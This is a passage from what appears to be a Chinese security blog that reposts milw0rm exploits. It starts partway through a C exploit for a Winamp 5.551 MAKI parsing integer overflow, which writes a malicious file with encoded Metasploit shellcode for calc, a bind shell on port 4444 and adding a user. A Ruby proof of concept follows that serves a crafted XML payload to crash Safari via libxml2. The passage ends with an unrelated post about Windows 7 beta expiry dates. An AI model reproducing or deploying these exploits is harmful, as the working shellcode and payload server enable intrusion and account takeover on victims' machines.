    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
    "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
    "\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
    "\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
    "\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
    "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
    "\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
    "\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
    "\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
    "\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
    "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
    "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
    "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
    "\x43\x55\x43
\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
    "\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
    "\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
    "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
    "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
    "\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
    "\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
    "\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
    "\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
    "\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
    "\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
    "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
    "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
    "\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
    "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
    "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
    "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
    "\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
    "\x4f\x4f\x42\x4d\x5a";

/* win32_adduser –  PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */

char Add_User_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
    "\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
    "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
    "\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
    "\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
    "\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
    "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
    "\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
    "\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
    "\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
    "\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
    "\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
    "\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
    "\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
    "\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
    "\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
    "\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
    "\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
    "\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
    "\x41\x44\x46\x44\x46\x44\x42\x30\x5a";

unsigned char Junk1 ='A';

int main()
{
    FILE *fp;
    int i;

    if ((fp = fopen(MAKI, "wb")) == NULL)
    {
        printf("File %s write error\n", MAKI);
        return(0);
    }

    for (i=0; i<sizeof(First_Header); i++)
        fputc(First_Header[i], fp);

    for (i=0; i<sizeof(Exception); i++)
        fputc(Exception[i], fp);

    for (i=0;i<16751;i++)
    {
        fwrite(&Junk1,1,1,fp);
    }
    fputs("\xeb\x06\x90\x90",fp);/*Pointer to next seh record */
    fputs("\x7C\x14\xF0\x12",fp);/*SE handler Universal adress 12F0147C */

    int input;

    printf("\n——————————————————");
    printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
    printf("\n\nExploit created by n00b");
    printf( "\n[1]. Calc Shell_Code" );
    printf( "\n[2]. Bind Shell_Code on port 4444" );
    printf( "\n[3]. Add user Shell_Code" );
    printf( "\n[4]. To exit and cancel" );
    printf( "\nPlease chose your Shell_Code:" );
    scanf( "%d", &input );
    switch ( input )
    {
    case 1:
        for (i=0; i<sizeof(Calc_ShellCode); i++)
            fputc(Calc_ShellCode[i], fp);
        break;
    case 2:
        for (i=0; i<sizeof(Bind_Shellcode); i++)
            fputc(Bind_Shellcode[i], fp);
        break;
    case 3:
        for (i=0; i
<sizeof(Add_User_Shellcode); i++)
            fputc(Add_User_Shellcode[i], fp);
        break;
    case 4:
        return 0;
        break;
    }
    fclose(fp);
    return 0;
}

// milw0rm.com [2009-05-26]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/198

Safari RSS feed:// 缓冲区溢出Exp代码

Safari RSS feed:// 缓冲区溢出Exp代码

复制内容到剪贴板程序代码程序代码
#!/usr/bin/ruby
#
# Quick-n-dirty PoC for APPLE-SA-2009-05-12 ala CVE-2008-3529
# Safari RSS feed:// buffer overflow via libxml2 by KF of Digitalmunition and Netragard
# http://www.digitalmunition.com , http://www.netragard.com
#
# The application PubSubAgent quit unexpectedly.
#
# Process:         PubSubAgent [3764]
# Path:            /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent
# Identifier:      PubSubAgent
# Version:         ??? (???)
# Code Type:       X86 (Native)
# Parent Process:  launchd [282]
#
# Date/Time:       2008-10-31 15:31:41.355 -0400
# OS Version:      Mac OS X 10.5.5 (9F33)
# Report Version:  6
#
# Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
# Exception Codes: KERN_INVALID_ADDRESS at 0x0000000005050500
#
# Thread 0 crashed with X86 Thread State (32-bit):
#  eax: 0x41414141  ebx: 0x94580535  ecx: 0x00136150  edx: 0x05050500
#  edi: 0x00007000  esi: 0x00100000  ebp: 0xbfffe298  esp: 0xbfffe220
#   ss: 0x0000001f  efl: 0x00010206  eip: 0x94580605   cs: 0x00000017
#   ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
#  cr2: 0x05050500
#
# On Windows libxml2.dll provides all the fun since there is no PubSubAgent
#
# EAX 0131FB10 ASCII "AAAAAAAAAAA…"
# ECX 003D0270
# EDX 00000000
# EBX 41414141
# ESP 030FE6FC
# EBP 030FE918
# ESI 0131FB08 ASCII "AAAAAAAAAAA…"
# EDI 41414141
# EIP 7C919084 ntdll.7C919084
#
# 7C919084   8B0B             MOV ECX,DWORD PTR DS:[EBX]
# 7C919086   3B4F 04          CMP ECX,DWORD PTR DS:[EDI+4]

require 'webrick'
include WEBrick

# Thats right… no one is taking on water, this is public info (and has been for a while)!
# https://bugzilla.redhat.com/attachment.cgi?id=315480

XML_LOVE =
'<?xml version="1.0"?>' + "\n" +
'<!DOCTYPE longentity [' + "\n" +
'<!ELEMENT longentity (#PCDATA)>' + "\n" +
'<!ENTITY ' +
"A" * 1000 + " " +
'"ha"> ]>' + "\n" +
'<longentity location="&' +
"A" * 1000 +
';">text</longentity>' + "\n"

REDIR_LOVE =
'<meta http-equiv="REFRESH" content="0;url=feed://' + ARGV[0] + '/pwn">'

s = HTTPServer.new( :Port => 80 )

class REDIRECT < HTTPServlet::AbstractServlet
def do_GET(req, res)
   res.body = REDIR_LOVE
   res['Content-Type'] = "text/html"
end
end

class XMLLOVER < HTTPServlet::AbstractServlet
def do_GET(req, res)
   res.body = XML_LOVE
   res['Content-Type'] = "text/xml"
end
end

s.mount("/", REDIRECT)
s.mount("/pwn", XMLLOVER)

trap("INT"){ s.shutdown }
s.start

# milw0rm.com [2009-05-26]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/199

微软也犯低级错误了-微软纠正windows7beta版自动关机期限

      今天早上hotmail邮箱收到一封微软关于windows7的邮件,内容是纠正此前关于windows 7 beta版失效及每两小时自动关机时间通知的。在上一个通知中微软给出的beta版每隔两小时自动关机的时间是2009.6.1,今天的邮件微软将此时间纠正为2009.7.1,以下为邮件全文:

引用内容 引用内容
Exploring Windows: Special Beta Edition — Correction

Because you signed up to test the Windows 7 Beta, we recently sent you mail about the expiration dates for the Beta and Release Candidate. Unfortunately, we made a mistake.
      更正的句子:
We said the Beta would start shutting down every two hours on June 1, 2009. The correct date is July 1, 2009.

The rest of the dates in the mail were correct. Here’s a quick summary:

Version:             Starts shutting down every two hours:       Expires:  
Beta                      July 1,  2009                                             August 1, 2009
Release Candidate  March 1, 2010                                         June 1, 2010

We apologize for the error and any confusion it may have caused.

Thanks again for helping us test Windows 7.

      没想到M$这样的跨国企业也会犯这样的低级错误,实属罕见。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/200